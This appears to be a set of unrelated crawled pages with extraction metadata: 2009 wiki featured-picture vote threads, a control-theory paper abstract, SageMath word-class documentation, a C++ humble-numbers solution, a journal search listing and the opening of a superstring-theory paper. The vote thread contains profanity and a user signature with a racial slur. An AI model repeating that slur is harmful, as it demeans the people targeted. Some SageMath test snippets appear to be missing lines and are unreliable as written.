BBQ: The King of the Triangular Snackfoods 19:47, 16 March 2009 (UTC) For Votes: 13 Nom + For I just think it's a funny picture, seeing as wrestlers could be compared to wild animals, so it's also kinda deep.--Smokin' Cheddar BBQ: The King of the Triangular Snackfoods 19:47, 16 March 2009 (UTC) I'm not voting, but WWF used to be Worldwide Wrestling Federation until the World Wildlife Foundation claimed rights to the acronym. So my point is that the picture is kinda a cross between the two things using the acronym.Or mabye I'm entirely wrong...Sonje how did you think of this???-- - StonedJeff  TALK talk to me 04:05, 22 March 2009 (UTC) Ahhahahhahaha (I fuckin' hate that commercial where they show that polar bear cub trying to follow it's mother, but it's pretty much made clear that it drowns, thanks assholes, as if I wasn't already depressed). -- Hi, hey! I'M A MOTERFUCKING NIGGER BITCH LOVER 19:50, 16 March 2009 (UTC) So true, despite the fact that it has nothing to do with this pic.--Smokin' Cheddar BBQ: The King of the Triangular Snackfoods Very For. —Socky (stalk) 19:51, 16 March 2009 (UTC) For! I understand Sonje still wants to finish some parts of this image, but she isn't gettng away with that one. Awesome image. ---kun "whisper sweet nothings into thine ear..." 20:41, 16 March 2009 (UTC) Sonje is a she??? I didn't know that.--Smokin' Cheddar BBQ: The King of the Triangular Snackfoods God, I know! And on the internet! Date her! ---kun "whisper sweet nothings into thine ear..." 22:13, 16 March 2009 (UTC) Lol. I didn't know Sonje is a she. VERY FOR!!! Sonje is great at this. 11:04, 17 March 2009 (UTC) For. --Mnb'z 14:46, 17 March 2009 (UTC) FOR --CrabPope 10:31, 18 March 2009 (UTC) For I don't know about deep...but funny non the less ~SirTagstit • VFH • NotM • PEEING • CPT • RotM • BFF 15:24, 18 March 2009 (UTC) Likey -- T​K​F​​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​CK 17:54, 22 March 2009 (UTC) Just For—Flutter (Talk•Games•Fun Pages•Awards•Help) 21:59, 22 March 2009 (UTC) For I get it. -- 19:09, 17 April 2009 (UTC) For, but hmm, what would my environmentalist friends think of this?-- 00:26, 21 April 2009 (UTC) For. -- User:KneeChee27/sig 18:39, 17 May 2009 (UTC) Against Votes: 6 Against Nicely done image, but I don't get the joke. Sry. 
MrN  Fork you! 03:17, Mar 22 Against I've seen better chops, especially from Sonje. Woody On Fire! Talking Woody Stalking Woody 20:17, 29 March 2009 (UTC) #Against per MrN. -- 22:49, 30 March 2009 (UTC) Against - 08:59, 2 April 2009 (UTC) against Djdorama 16:09, 11 April 2009 (UTC) Weak against It is funny but the chopping isn't all that great. -- 09:03, 6 May 2009 (UTC) Against. I looked at this image and said "huh?" After reading comments I found out that the image was used in a wrestling article and understood, however the image does not stand on its own. Robertodole 09:42, 6 May 2009 (UTC) Comments Abstain. - Meh. • • • 15:39, Mar 18 Back in the very early days of pro wrestling it was a fairly common practice to book matches between a wrestler and a bear. This has almost nothing to do with the picture, I just thought it was quite interesting. -- 20:51, 20 March 2009 (UTC) Comment: the lighting on that bear's head looks off. Shouldn't it be more lit up from the flash? Other than that, I don't really get it... - T.L.B. WotM, UotM, FPrize, AotM, ANotM, PLS, UN:HS, GUN 03:11, Mar 22 Abstain. - On the one hand, there is little to no text and the hair was very artfully pasted. On the other hand, it isn't that funny. Rbpolsen♦☺ 02:19, 26 March 2009 (UTC) Comment:I don't think this one will work as a featured pic on its own. I made it for Nachlader's WWF article, it worked in the context of the article. -- 12:00, 10 April 2009 (UTC) I think it would work. If you've ever seen pro wrestlers, they don't look like normal human beings. They sometimes look like vicious animals that will bite you head off. Therefore, it's an incredibly accurate metaphor represented by an excellently 'shopped and humorous image. --Cheddar Over two months, +7, Fail'd. 20:52, 22 May 2009 (UTC) "Rick" Bird.png (history, logs) Featured picture candidate You know the rules and so do I Image credit: Iwillkillyou333 Archive - Discuss this image Vote Score: -3 Nomination: Iwillkillyou333 20:58, 22 May 2009 (UTC) For Votes: 2 Tis as if the gods themselves crafted this image --CrabPope 21:43, 22 May 2009 (UTC) Wonderfull... 03:45, 23 May 2009 (UTC) Against Votes: 5 No wonder we're in a bloody recession. ---kun "whisper sweet nothings into thine ear..." 21:05, 22 May 2009 (UTC) I don't know if the front page can even handle an image with so much quality. User:KneeChee27/sig2 21:29, 22 May 2009 (UTC) Against. His version of Particle Man kicked ass. This, not so much. 02:42, 23 May 2009 (UTC) Do the rules include inexplicable eraser marks and strange missing pieces of head? -- 03:15, 23 May 2009 (UTC) Rickroll'd. 09:07, 23 May 2009 (UTC) Comments Thanks for all the sarcasms, NOT!} --Iwillkillyou333 04:00, 23 May 2009 (UTC) -3, fail'd. 14:23, 23 May 2009 (UTC)
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 1, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7628136277198792, "perplexity": 19381.02004643625}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-49/segments/1416931011032.12/warc/CC-MAIN-20141125155651-00229-ip-10-235-23-156.ec2.internal.warc.gz"}
https://hal.inria.fr/hal-01970655
# Stability and Robust Stabilisation Through Envelopes for Retarded Time-Delay Systems

1 DISCO - Dynamical Interconnected Systems in COmplex Environments (L2S - Laboratoire des signaux et systèmes, Inria Saclay - Ile de France, SUPELEC, CNRS - Centre National de la Recherche Scientifique : UMR8506)
2 Division Systèmes - L2S (L2S - Laboratoire des signaux et systèmes : 1289)

Abstract: This work deals with the stability and robust stabilisation of retarded time-delay systems by applying a new method for obtaining an envelope that bounds all the system poles. Through LMIs we are able to determine envelopes that can be applied to verify the stability of the system and can also be utilised to design robust state-feedback controllers which cope with design requirements regarding $\alpha$-stability.

Document type: Conference papers. https://hal.inria.fr/hal-01970655

### Identifiers

• HAL Id: hal-01970655, version 1

### Citation

Caetano Cardeliquio, André Fioravanti, Catherine Bonnet, Silviu-Iulian Niculescu. Stability and Robust Stabilisation Through Envelopes for Retarded Time-Delay Systems. 9th IFAC Symposium on Robust Control Design, Sep 2018, Florianopolis, Brazil. ⟨hal-01970655⟩
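The abstract does not reproduce the LMIs themselves. As a purely generic illustration of the kind of semidefinite feasibility problem such conditions reduce to (a delay-free Lyapunov inequality, not the envelope or $\alpha$-stability conditions of the paper), one could write the following sketch, assuming `cvxpy` and `numpy` are available:

```python
# Generic illustration only: a delay-free Lyapunov LMI feasibility test.
# This is NOT the envelope LMI of the paper (which handles retarded
# time-delay systems); it only shows the shape of an LMI-based stability check.
import numpy as np
import cvxpy as cp

A = np.array([[0.0, 1.0],
              [-2.0, -3.0]])        # arbitrary test matrix (eigenvalues -1, -2)
n = A.shape[0]
eps = 1e-6

P = cp.Variable((n, n), symmetric=True)
constraints = [P >> eps * np.eye(n),                       # P positive definite
               A.T @ P + P @ A << -eps * np.eye(n)]        # Lyapunov inequality
problem = cp.Problem(cp.Minimize(0), constraints)
problem.solve()

print(problem.status)   # 'optimal' indicates a feasible P, i.e. A is Hurwitz
```

A feasible $P$ here certifies that the test matrix is Hurwitz; the envelope conditions described in the abstract play an analogous certifying role for the pole locations of retarded time-delay systems.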
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.26240524649620056, "perplexity": 7812.327779161853}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-26/segments/1560627998708.41/warc/CC-MAIN-20190618083336-20190618105336-00222.warc.gz"}
http://www.sagemath.org/doc/reference/combinat/sage/combinat/words/word.html
Word classes¶ AUTHORS: • Arnaud Bergeron • Amy Glen • Sébastien Labbé • Franco Saliola class sage.combinat.words.word.FiniteWord_callable(parent, callable, length=None) Bases: sage.combinat.words.word_infinite_datatypes.WordDatatype_callable, sage.combinat.words.finite_word.FiniteWord_class Finite word represented by a callable. For such word $$w$$, type w. and hit TAB key to see the list of functions defined on $$w$$. EXAMPLES: sage: f = lambda n : 3 if n > 8 else 6 sage: w = Word(f, length=30, caching=False) sage: w word: 666666666333333333333333333333 sage: w.is_symmetric() True TESTS: sage: w = Word(lambda n:n, length=10, caching=False) sage: type(w) <class 'sage.combinat.words.word.FiniteWord_callable'> sage: w == z True sage: type(z) <class 'sage.combinat.words.word.FiniteWord_callable'> class sage.combinat.words.word.FiniteWord_callable_with_caching(parent, callable, length=None) Bases: sage.combinat.words.word_infinite_datatypes.WordDatatype_callable_with_caching, sage.combinat.words.finite_word.FiniteWord_class Finite word represented by a callable (with caching). For such word $$w$$, type w. and hit TAB key to see the list of functions defined on $$w$$. EXAMPLES: sage: f = lambda n : n % 3 sage: w = Word(f, length=32) sage: w word: 01201201201201201201201201201201 sage: w.border() word: 01201201201201201201201201201 TESTS: sage: w = Word(lambda n:n, length=10) sage: type(w) <class 'sage.combinat.words.word.FiniteWord_callable_with_caching'> sage: w == z True sage: type(z) <class 'sage.combinat.words.word.FiniteWord_callable_with_caching'> Pickle also works for concatenation of words: sage: w = Word(range(10)) * Word('abcdef') sage: type(w) <class 'sage.combinat.words.word.FiniteWord_callable_with_caching'> sage: w == z True sage: type(z) <class 'sage.combinat.words.word.FiniteWord_list'> Pickle also works for power of words: sage: w = Word(range(10)) ^ 2 sage: type(w) <class 'sage.combinat.words.word.FiniteWord_callable_with_caching'> sage: w == z True sage: type(z) <class 'sage.combinat.words.word.FiniteWord_list'> class sage.combinat.words.word.FiniteWord_iter(parent, iter, length=None) Bases: sage.combinat.words.word_infinite_datatypes.WordDatatype_iter, sage.combinat.words.finite_word.FiniteWord_class Finite word represented by an iterator. For such word $$w$$, type w. and hit TAB key to see the list of functions defined on $$w$$. EXAMPLES: sage: w = Word(iter(range(10)), caching=False) sage: w word: 0123456789 sage: w.finite_differences() word: 111111111 TESTS: sage: w = Word(iter(range(10)), caching=False) sage: type(w) <class 'sage.combinat.words.word.FiniteWord_iter'> sage: w == z True sage: type(z) <class 'sage.combinat.words.word.FiniteWord_list'> class sage.combinat.words.word.FiniteWord_iter_with_caching(parent, iter, length=None) Bases: sage.combinat.words.word_infinite_datatypes.WordDatatype_iter_with_caching, sage.combinat.words.finite_word.FiniteWord_class Finite word represented by an iterator (with caching). For such word $$w$$, type w. and hit TAB key to see the list of functions defined on $$w$$. 
EXAMPLES:
sage: w = Word(iter('abcdef'))
sage: w.conjugate(2)
word: cdefab

TESTS:
sage: w = Word(iter(range(10)))
sage: type(w)
<class 'sage.combinat.words.word.FiniteWord_iter_with_caching'>
sage: z = loads(dumps(w))
sage: w == z
True
sage: type(z)
<class 'sage.combinat.words.word.FiniteWord_list'>

class sage.combinat.words.word.FiniteWord_list
Bases: sage.combinat.words.word_datatypes.WordDatatype_list, sage.combinat.words.finite_word.FiniteWord_class
Finite word represented by a Python list. For any word $$w$$, type w. and hit TAB key to see the list of functions defined on $$w$$.
EXAMPLES:
sage: w = Word(range(10))
sage: w.iterated_right_palindromic_closure()
word: 0102010301020104010201030102010501020103...
TESTS:
sage: w = Word([0,1,1,0])
sage: w == loads(dumps(w))
True

class sage.combinat.words.word.FiniteWord_str
Bases: sage.combinat.words.word_datatypes.WordDatatype_str, sage.combinat.words.finite_word.FiniteWord_class
Finite word represented by a Python str. For such word $$w$$, type w. and hit TAB key to see the list of functions defined on $$w$$.
EXAMPLES:
sage: w = Word('abcdef')
sage: w.is_square()
False
TESTS:
sage: w = Word('abba')
sage: w == loads(dumps(w))
True

class sage.combinat.words.word.FiniteWord_tuple
Bases: sage.combinat.words.word_datatypes.WordDatatype_tuple, sage.combinat.words.finite_word.FiniteWord_class
Finite word represented by a Python tuple. For such word $$w$$, type w. and hit TAB key to see the list of functions defined on $$w$$.
EXAMPLES:
sage: w = Word(())
sage: w.is_empty()
True
TESTS:
sage: w = Word((0,1,1,0))
sage: w == loads(dumps(w))
True

class sage.combinat.words.word.InfiniteWord_callable(parent, callable, length=None)
Bases: sage.combinat.words.word_infinite_datatypes.WordDatatype_callable, sage.combinat.words.infinite_word.InfiniteWord_class
Infinite word represented by a callable. For such word $$w$$, type w. and hit TAB key to see the list of functions defined on $$w$$. Infinite words behave like a Python list: they can be sliced using square brackets to define for example a prefix or a factor.
EXAMPLES:
sage: w = Word(lambda n:n, caching=False)
sage: w
word: 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,...
sage: w.iterated_right_palindromic_closure()
word: 0102010301020104010201030102010501020103...
TESTS:
sage: w = Word(lambda n:n, caching=False)
sage: type(w)
<class 'sage.combinat.words.word.InfiniteWord_callable'>
sage: z = loads(dumps(w))
sage: z
word: 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,...
sage: type(z)
<class 'sage.combinat.words.word.InfiniteWord_callable'>

class sage.combinat.words.word.InfiniteWord_callable_with_caching(parent, callable, length=None)
Bases: sage.combinat.words.word_infinite_datatypes.WordDatatype_callable_with_caching, sage.combinat.words.infinite_word.InfiniteWord_class
Infinite word represented by a callable (with caching). For such word $$w$$, type w. and hit TAB key to see the list of functions defined on $$w$$. Infinite words behave like a Python list: they can be sliced using square brackets to define for example a prefix or a factor.
EXAMPLES:
sage: w = Word(lambda n:n)
sage: factor = w[4:13]
sage: factor
word: 4,5,6,7,8,9,10,11,12
TESTS:
sage: w = Word(lambda n:n)
sage: type(w)
<class 'sage.combinat.words.word.InfiniteWord_callable_with_caching'>
sage: z = loads(dumps(w))
sage: z
word: 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,...
sage: type(z)
<class 'sage.combinat.words.word.InfiniteWord_callable_with_caching'>

class sage.combinat.words.word.InfiniteWord_iter(parent, iter, length=None)
Bases: sage.combinat.words.word_infinite_datatypes.WordDatatype_iter, sage.combinat.words.infinite_word.InfiniteWord_class
Infinite word represented by an iterable. For such word $$w$$, type w. and hit TAB key to see the list of functions defined on $$w$$. Infinite words behave like a Python list: they can be sliced using square brackets to define for example a prefix or a factor.
EXAMPLES:
sage: from itertools import chain, cycle
sage: w = Word(chain('letsgo', cycle('forever')), caching=False)
sage: w
word: letsgoforeverforeverforeverforeverforeve...
sage: prefix = w[:100]
sage: prefix
word: letsgoforeverforeverforeverforeverforeve...
sage: prefix.is_lyndon()
False
TESTS:
sage: from itertools import count
sage: w = Word(count(), caching=False)
sage: type(w)
<class 'sage.combinat.words.word.InfiniteWord_iter'>
Pickle is not supported for infinite word defined by an iterator:
sage: dumps(w)
Traceback (most recent call last):
...
PicklingError: Can't pickle <type 'generator'>: attribute lookup __builtin__.generator failed

class sage.combinat.words.word.InfiniteWord_iter_with_caching(parent, iter, length=None)
Bases: sage.combinat.words.word_infinite_datatypes.WordDatatype_iter_with_caching, sage.combinat.words.infinite_word.InfiniteWord_class
Infinite word represented by an iterable (with caching). For such word $$w$$, type w. and hit TAB key to see the list of functions defined on $$w$$. Infinite words behave like a Python list: they can be sliced using square brackets to define for example a prefix or a factor.
EXAMPLES:
sage: from itertools import cycle
sage: w = Word(cycle([9,8,4]))
sage: w
word: 9849849849849849849849849849849849849849...
sage: prefix = w[:23]
sage: prefix
word: 98498498498498498498498
sage: prefix.minimal_period()
3
TESTS:
sage: from itertools import count
sage: w = Word(count())
sage: type(w)
<class 'sage.combinat.words.word.InfiniteWord_iter_with_caching'>
Pickle is not supported for infinite word defined by an iterator:
sage: dumps(w)
Traceback (most recent call last):
...
PicklingError: Can't pickle <type 'generator'>: attribute lookup __builtin__.generator failed

sage.combinat.words.word.Word(data=None, alphabet=None, length=None, datatype=None, caching=True, RSK_data=None)
Construct a word.
INPUT:
• data – (default: None) list, string, tuple, iterator, free monoid element, None (shorthand for []), or a callable defined on [0,1,...,length].
• alphabet – any argument accepted by Words
• length – (default: None) This is dependent on the type of data. It is ignored for words defined by lists, strings, tuples, etc., because they have a naturally defined length. For callables, this defines the domain of definition, which is assumed to be [0, 1, 2, ..., length-1]. For iterators: Infinity if you know the iterator will not terminate (default); "unknown" if you do not know whether the iterator terminates; "finite" if you know that the iterator terminates, but do not know the length.
• datatype – (default: None) None, "list", "str", "tuple", "iter", "callable". If None, then the function tries to guess this from the data.
• caching – (default: True) True or False. Whether to keep a cache of the letters computed by an iterator or callable.
• RSK_data – (Optional. Default: None) A semistandard and a standard Young tableau to run the inverse RSK bijection on.

Note
Be careful when defining words using callables and iterators. It appears that islice does not pickle correctly, causing various errors when reloading. Also, most iterators do not support copying and should not support pickling by extension.

EXAMPLES:
Empty word:
sage: Word()
word:
Word with string:
sage: Word("abbabaab")
word: abbabaab
Word with string constructed from other types:
sage: Word([0,1,1,0,1,0,0,1], datatype="str")
word: 01101001
sage: Word((0,1,1,0,1,0,0,1), datatype="str")
word: 01101001
Word with list:
sage: Word([0,1,1,0,1,0,0,1])
word: 01101001
Word with list constructed from other types:
sage: Word("01101001", datatype="list")
word: 01101001
sage: Word((0,1,1,0,1,0,0,1), datatype="list")
word: 01101001
Word with tuple:
sage: Word((0,1,1,0,1,0,0,1))
word: 01101001
Word with tuple constructed from other types:
sage: Word([0,1,1,0,1,0,0,1], datatype="tuple")
word: 01101001
sage: Word("01101001", datatype="str")
word: 01101001
Word with iterator:
sage: from itertools import count
sage: Word(count())
word: 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,...
sage: Word(iter("abbabaab")) # iterators default to infinite words
word: abbabaab
sage: Word(iter("abbabaab"), length="unknown")
word: abbabaab
sage: Word(iter("abbabaab"), length="finite")
word: abbabaab
Word with function (a ‘callable’):
sage: f = lambda n : add(Integer(n).digits(2)) % 2
sage: Word(f)
word: 0110100110010110100101100110100110010110...
sage: Word(f, length=8)
word: 01101001
Word over a string with a parent:
sage: w = Word("abbabaab", alphabet="abc"); w
word: abbabaab
sage: w.parent()
Words over {'a', 'b', 'c'}
Word from a free monoid element:
sage: M.<x,y,z> = FreeMonoid(3)
sage: Word(x^3*y*x*z^2*x)
word: xxxyxzzx
The default parent is the combinatorial class of all words:
sage: w = Word("abbabaab"); w
word: abbabaab
sage: w.parent()
Words
We can also input a semistandard tableau and a standard tableau to obtain a word from the inverse RSK algorithm using the RSK_data option:
sage: p = Tableau([[1,2,2],[3]]); q = Tableau([[1,2,4],[3]])
sage: Word(RSK_data=[p, q])
word: 1322
TESTS:
sage: Word(5)
Traceback (most recent call last):
...
ValueError: Cannot guess a datatype from data (=5); please specify one
sage: W = Words()
sage: w = W('abc')
sage: w is W(w)
True
sage: w is Word(w, alphabet='abc')
False

class sage.combinat.words.word.Word_iter(parent, iter, length=None)
Bases: sage.combinat.words.word_infinite_datatypes.WordDatatype_iter, sage.combinat.words.abstract_word.Word_class
Word of unknown length (finite or infinite) represented by an iterable. For such word $$w$$, type w. and hit TAB key to see the list of functions defined on $$w$$. Words behave like a Python list: they can be sliced using square brackets to define for example a prefix or a factor.
EXAMPLES:
sage: w = Word(iter([1,1,4,9]*1000), length='unknown', caching=False)
sage: w
word: 1149114911491149114911491149114911491149...
sage: w.delta()
word: 2112112112112112112112112112112112112112...
TESTS:
sage: w = Word(iter('abcd'*100), length='unknown', caching=False)
sage: type(w)
<class 'sage.combinat.words.word.Word_iter'>
sage: w
word: abcdabcdabcdabcdabcdabcdabcdabcdabcdabcd...
Pickle is not supported for word of unknown length defined by an iterator:
sage: dumps(w)
Traceback (most recent call last):
...
PicklingError: Can't pickle <type 'generator'>: attribute lookup __builtin__.generator failed

class sage.combinat.words.word.Word_iter_with_caching(parent, iter, length=None)
Bases: sage.combinat.words.word_infinite_datatypes.WordDatatype_iter_with_caching, sage.combinat.words.abstract_word.Word_class
Word of unknown length (finite or infinite) represented by an iterable (with caching). For such word $$w$$, type w. and hit TAB key to see the list of functions defined on $$w$$. Words behave like a Python list: they can be sliced using square brackets to define for example a prefix or a factor.
EXAMPLES:
sage: w = Word(iter([1,2,3]*1000), length='unknown')
sage: w
word: 1231231231231231231231231231231231231231...
sage: w.finite_differences(mod=2)
word: 1101101101101101101101101101101101101101...
TESTS:
sage: w = Word(iter('abcd'*100), length='unknown')
sage: type(w)
<class 'sage.combinat.words.word.Word_iter_with_caching'>
sage: w
word: abcdabcdabcdabcdabcdabcdabcdabcdabcdabcd...
Pickle is not supported for word of unknown length defined by an iterator:
sage: dumps(w)
Traceback (most recent call last):
...
PicklingError: Can't pickle <type 'generator'>: attribute lookup __builtin__.generator failed
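As a quick summary of how the Word constructor documented above dispatches to these concrete classes, here is a short illustrative session (a sketch assembled from the class listing on this page, not a copied doctest):

sage: type(Word("abba"))
<class 'sage.combinat.words.word.FiniteWord_str'>
sage: type(Word((0, 1, 1, 0)))
<class 'sage.combinat.words.word.FiniteWord_tuple'>
sage: type(Word(lambda n: n % 3))
<class 'sage.combinat.words.word.InfiniteWord_callable_with_caching'>
sage: type(Word(lambda n: n % 3, caching=False))
<class 'sage.combinat.words.word.InfiniteWord_callable'>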
https://www.oyohyee.com/post/HDU/1058/
# Problem

## Description

A number whose only prime factors are 2, 3, 5 or 7 is called a humble number. The sequence 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 12, 14, 15, 16, 18, 20, 21, 24, 25, 27, ... shows the first 20 humble numbers. Write a program to find and print the nth element in this sequence.

## Input

The input consists of one or more test cases. Each test case consists of one integer n with 1 <= n <= 5842. Input is terminated by a value of zero (0) for n.

## Output

For each test case, print one line saying "The nth humble number is number.". Depending on the value of n, the correct suffix "st", "nd", "rd", or "th" for the ordinal number nth has to be used like it is shown in the Sample Output.

## Sample Input

1 2 3 4 11 12 13 21 22 23 100 1000 5842 0

## Sample Output

The 1st humble number is 1.
The 2nd humble number is 2.
The 3rd humble number is 3.
The 4th humble number is 4.
The 11th humble number is 12.
The 12th humble number is 14.
The 13th humble number is 15.
The 21st humble number is 28.
The 22nd humble number is 30.
The 23rd humble number is 32.
The 100th humble number is 450.
The 1000th humble number is 385875.
The 5842nd humble number is 2000000000.

# Solution

**Ugly (humble) numbers.**

I spent more time on the st/nd/rd/th ordinal suffixes than on the humble numbers themselves...

# Code

/*
By: OhYee
Github: OhYee
HomePage: http://www.oyohyee.com
Email: [email protected]
Smart and cute? Elichika!
*/
#include <cstdio>
#include <algorithm>
#include <cstring>
#include <cmath>
#include <string>
#include <iostream>
#include <vector>
#include <list>
#include <queue>
#include <stack>
#include <map>
#include <set>
using namespace std;

const int maxn = 5843;
int dp[maxn + 1];   // dp[1..5842] hold the humble numbers; one extra slot because the loop below writes dp[maxn]
const char *c[] = {"", "st", "nd", "rd"};   // (unused in the final version)

bool Do() {
    int n;
    scanf("%d", &n);
    if (n == 0)
        return false;
    // Pick the ordinal suffix; 11, 12 and 13 are the exceptions that keep "th".
    char t[3] = "th";
    if (n % 10 == 1 && n % 100 != 11)
        t[0] = 's', t[1] = 't';
    else if (n % 10 == 2 && n % 100 != 12)
        t[0] = 'n', t[1] = 'd';
    else if (n % 10 == 3 && n % 100 != 13)
        t[0] = 'r', t[1] = 'd';
    printf("The %d%s humble number is %d.\n", n, t, dp[n]);
    return true;
}

int main() {
    // Classic merge-style DP: the next humble number is the smallest unused
    // multiple of 2, 3, 5 or 7 of an already generated humble number.
    int i1 = 1, i2 = 1, i3 = 1, i4 = 1;
    int n = 1;
    dp[1] = 1;
    while (n < maxn) {
        dp[++n] = min(min(2 * dp[i1], 3 * dp[i2]), min(5 * dp[i3], 7 * dp[i4]));
        if (dp[n] == 2 * dp[i1]) i1++;
        if (dp[n] == 3 * dp[i2]) i2++;
        if (dp[n] == 5 * dp[i3]) i3++;
        if (dp[n] == 7 * dp[i4]) i4++;
    }
    while (Do());
    return 0;
}
http://cms.math.ca/cjm/msc/46H30?fromjnl=cjm&jnl=CJM
Search results

Search: MSC category 46H30 ( Functional calculus in topological algebras [See also 47A60] )

Results 1 - 2 of 2

1. CJM 2015 (vol 67 pp. 759)
Carey, Alan L; Gayral, Victor; Phillips, John; Rennie, Adam; Sukochev, Fedor
Spectral Flow for Nonunital Spectral Triples
We prove two results about nonunital index theory left open in a previous paper. The first is that the spectral triple arising from an action of the reals on a $C^*$-algebra with invariant trace satisfies the hypotheses of the nonunital local index formula. The second result concerns the meaning of spectral flow in the nonunital case. For the special case of paths arising from the odd index pairing for smooth spectral triples in the nonunital setting we are able to connect with earlier approaches to the analytic definition of spectral flow.
Keywords: spectral triple, spectral flow, local index theorem
Category: 46H30

2. CJM 2007 (vol 59 pp. 3)
Biller, Harald
Holomorphic Generation of Continuous Inverse Algebras
We study complex commutative Banach algebras (and, more generally, continuous inverse algebras) in which the holomorphic functions of a fixed $n$-tuple of elements are dense. In particular, we characterize the compact subsets of $\C^n$ which appear as joint spectra of such $n$-tuples. The characterization is compared with several established notions of holomorphic convexity by means of approximation conditions.
Keywords: holomorphic functional calculus, commutative continuous inverse algebra, holomorphic convexity, Stein compacta, meromorphic convexity, holomorphic approximation
Categories: 46H30, 32A38, 32E30, 41A20, 46J15
https://www.arxiv-vanity.com/papers/1710.07232/
April 4, 2021 Vertical Integration from the Large Hilbert Space Theodore Erler111, Sebastian Konopka222 Institute of Physics of the ASCR, v.v.i. Na Slovance 2, 182 21 Prague 8, Czech Republic Abstract We develop an alternative description of the procedure of vertical integration based on the observation that amplitudes can be written in BRST exact form in the large Hilbert space. We relate this approach to the description of vertical integration given by Sen and Witten. ## 1 Introduction and Summary Computing a superstring scattering amplitude requires inserting a configuration of picture changing operators (PCOs) for each Riemann surface contributing to the amplitude. A choice of PCOs roughly corresponds to a section of a fiber bundle: The base of the fibre bundle consists of the moduli space of Riemann surfaces with the relevant genus, spin structure, and number of punctures, and the fiber at each point consists of copies of the Riemann surface with the corresponding value of the moduli; this parameterizes the possible ways of inserting PCOs on that surface. The worldsheet path integral defines a measure on this fiber bundle which can be pulled back to any submanifold; in particular, pulling the measure back onto a section of the fiber bundle and integrating defines a superstring amplitude with a prescribed configuration of PCOs on each Riemann surface. A significant complication with this procedure, however, is the appearance of spurious singularities in the superstring measure [1]. One can try to look for a global section which avoids spurious singularities everywhere, but this may be inconvenient in practice, or there may be an obstruction to the existence of such a global section.333It is known that the supermoduli space of super-Riemann surfaces cannot be holomorphically projected down to the ordinary (bosonic) moduli space of Riemann surfaces [2]. To our knowledge, the implications of this fact from the point of view of PCOs has not been worked out, but one possibility is that the PCO positions cannot be chosen globally as holomorphic functions of the moduli. A remedy proposed by Sen [3], and later made more explicit by Sen and Witten [4], is to divide the moduli space into regions so that on each region we can choose a local section which avoids spurious poles. Simply adding the contributions from the local sections together, however, does not define a gauge invariant amplitude. To correct for this, at the interface between the different regions of the moduli space we must integrate “along the fiber” to connect local sections—that is, one must deform one choice of PCOs into another while keeping the moduli fixed. This is called vertical integration. The amplitude is then defined by a closed integration cycle in the fiber bundle composed of local sections connected by “vertical segments.” Importantly, the nature of the superstring measure implies that spurious singularities can be rendered harmless on the vertical segments. Therefore we can obtain gauge invariant amplitudes free from unphysical divergences in the measure. In this paper we investigate a different, more algebraic, approach to this problem, motivated by recent studies of superstring field theories [5, 6]. Consider an -point amplitude expressed as an -fold bra state: ⟨Ap|: H⊗n→C, (1.1) where is a CFT vector space containing BRST invariant physical states. The superscript indicates that the amplitude contains picture changing operators inserted in some way on the constituent Riemann surfaces. 
Gauge invariance of the amplitude is equivalent to the statement that this bra state is annihilated by a sum of BRST operators acting on each external state: ⟨Ap|(Q⊗I⊗n−1+...+I⊗n−1⊗Q)=0. (1.2) Here denotes the BRST operator and is the identity operator on . It is well-known that the cohomology of is trivial in the “large Hilbert space” introduced by Friedan, Martinec, and Shenker [7], that is, the CFT state space obtained by bosonizing the ghosts into the system and allowing for states which depend on the zero mode of the ghost. This implies that the amplitude can be expressed in the form ⟨Ap|=⟨αp|(Q⊗I⊗n−1+...+I⊗n−1⊗Q). (1.3) We will call the -fold bra state a gauge amplitude, following the terminology of [6]. The gauge amplitude lives in the large Hilbert space. However, the physical amplitude must reside in the “small Hilbert space” where the zero mode of the ghost is absent. This requires that the amplitude satisfies ⟨Ap|(η⊗I⊗n−1+...+I⊗n−1⊗η)=0, (1.4) where denotes the zero mode of the eta ghost. This is consistent with (1.3) provided that the object 